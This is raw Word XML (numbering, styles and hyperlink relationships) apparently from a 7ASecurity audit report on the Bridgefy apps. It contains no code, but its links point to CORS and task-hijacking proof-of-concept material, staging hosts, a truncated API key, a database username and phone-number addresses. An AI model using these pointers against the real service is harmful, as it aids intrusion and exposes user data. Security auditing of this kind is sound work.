        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3735" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4590" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5445" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6300" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7155" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8010" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4860" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5940" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7020" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8100" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8640" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>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TOC1" w:type="paragraph">
    <w:name w:val="TOC 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TOC2" w:type="paragraph">
    <w:name w:val="TOC 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="60"/>
      <w:ind w:left="1080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="BodyText" w:type="paragraph">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading1" w:type="paragraph">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading2" w:type="paragraph">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading3" w:type="paragraph">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Title" w:type="paragraph">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="3780"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="60"/>
      <w:szCs w:val="60"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="ListParagraph" w:type="paragraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1440" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TableParagraph" w:type="paragraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="99"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>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hyperlink" Target="mailto:sales@7asecurity.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://7asecurity.com/"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header" Target="header2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bridgefy.me/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.google.com/store/apps/details?id=me.bridgefy.main&amp;hl=en&amp;gl=US" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://apps.apple.com/us/app/bridgefy-offline-messages/id975776347" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-app-android/tree/staging" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-app-ios/tree/configuration/staging" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-sdk-android/tree/staging" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-sdk-ios/tree/big-feature/security-audit" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.staging.bridgefy.me/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://staging.app.bridgefy.services/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://staging.sdk.bridgefy.services/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://staging.broker.bridgefy.services:8084/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-app-backend/tree/staging" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-APP-infra/tree/staging" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-sdk-backend/tree/staging" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-SDK-infra/tree/staging" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bridgefy.notion.site/Bridgefy-b46fb4d837574bbfa36e9210d746d860" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://7as.es/Bridgefy_ytn9q4n7/cors_poc.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fetch.spec.whatwg.org/#cors-protocol-and-credentials" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html#cross-origin-resource-sharing" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://firebase.google.com/docs/reference/rest/auth/#section-create-email-password" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.staging.bridgefy.me/auth/account-information" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/identity-platform/docs/password-policy" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#implement-proper-password-strength-controls" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/MQTT" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:%2B12064512559@bridgefy.app" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-zap/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.telerik.com/fiddler" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:%2B12012987481@bridgefy.app" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:%2B12066561175@bridgefy.app" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:(%2B12012987481@bridgefy.app" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:(%2B12064512559@bridgefy.app" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key=AIzaSyB8" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.f-secure.com/blog/how-secure-is-your-android-keystore-authentication" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/FSecureLABS/android-keystore-audit/tree/master/keystorecrypto-app/app/src/main/java/com/example/keystorecrypto" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/security/secaccesscontrolcreateflags/ksecaccesscontrolbiometryany" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/security/secaccesscontrolcreateflags/ksecaccesscontrolbiometrycurrentset" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://staging.broker.bridgefy.services/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:wUYsA@staging.whqu3.mongodb.net" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:wrongpass@staging.whqu3.mongodb.net" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.emqx.io/docs/en/v5.0/security/authn/mnesia.html#create-password-authentication-using-built-in-database" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/guide/topics/manifest/activity-element#lmode" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.helpnetsecurity.com/2019/12/03/strandhogg-vulnerability/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s2.ist.psu.edu/paper/usenix15-final-ren.pdf" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.helpnetsecurity.com/2020/05/28/cve-2020-0096/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.xda-developers.com/strandhogg-2-0-android-vulnerability-explained-developer-mitigation/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://source.android.com/security/bulletin/2020-05-01" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2019/12/vulnerability-in-fully-patched-android-phones-under-active-attack-by-bank-thieves/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/az0mb13/Task_Hijacking_Strandhogg/tree/main/AttackerApp" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/az0mb13/Task_Hijacking_Strandhogg" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://7as.es/Bridgefy_ytn9q4n7/PoC/TaskHijacking_PoC.mp4" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/phdays/android-task-hijacking" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/reference/android/app/Application.ActivityLifecycleCallbacks#onActivityPaused(android.app.Activity)" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/reference/androidx/lifecycle/Lifecycle.Event" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://developer.android.com/reference/android/view/Display.html#FLAG_SECURE" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/studio/command-line/logcat" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/a/4592958" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/a/2466662" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/localauthentication/lacontext" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/localauthentication/lacontext/1514176-evaluatepolicy" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sensepost/objection" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://frida.re/docs/ios/" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/foundation/nsfileprotectioncompleteuntilfirstuserauthentication" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_developer_default-data-protection" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/foundation/nsfileprotectioncomplete" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/27933387/nsurlcache-and-data-protection" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zetetic.net/sqlcipher/ios-tutorial/" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.quovantis.com/best-practices-to-avoid-security-vulnerabilities-in-your-ios-app/" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zetetic.net/sqlcipher/" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html%23//apple_ref/doc/uid/TP40010672-CH2-SW28" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bencoding.com/2017/02/20/swift-excluding-files-from-icloud-backup/" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:(%2B12066561175@bridgefy.app" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:(%2B12014222730@bridgefy.app" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssllabs.com/ssltest/analyze.html?d=www.bridgefy.me&amp;hideResults=on" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssllabs.com/ssltest/analyze.html?d=bridgefy.me&amp;hideResults=on" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssllabs.com/ssltest/analyze.html?d=staging.sdk.bridgefy.services&amp;s=18.215.72.71&amp;hideResults=on" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssllabs.com/ssltest/analyze.html?d=staging.app.bridgefy.services&amp;s=34.193.139.227&amp;hideResults=on" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssllabs.com/ssltest/analyze.html?d=staging.broker.bridgefy.services&amp;s=3.235.213.66&amp;hideResults=on&amp;latest" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html" 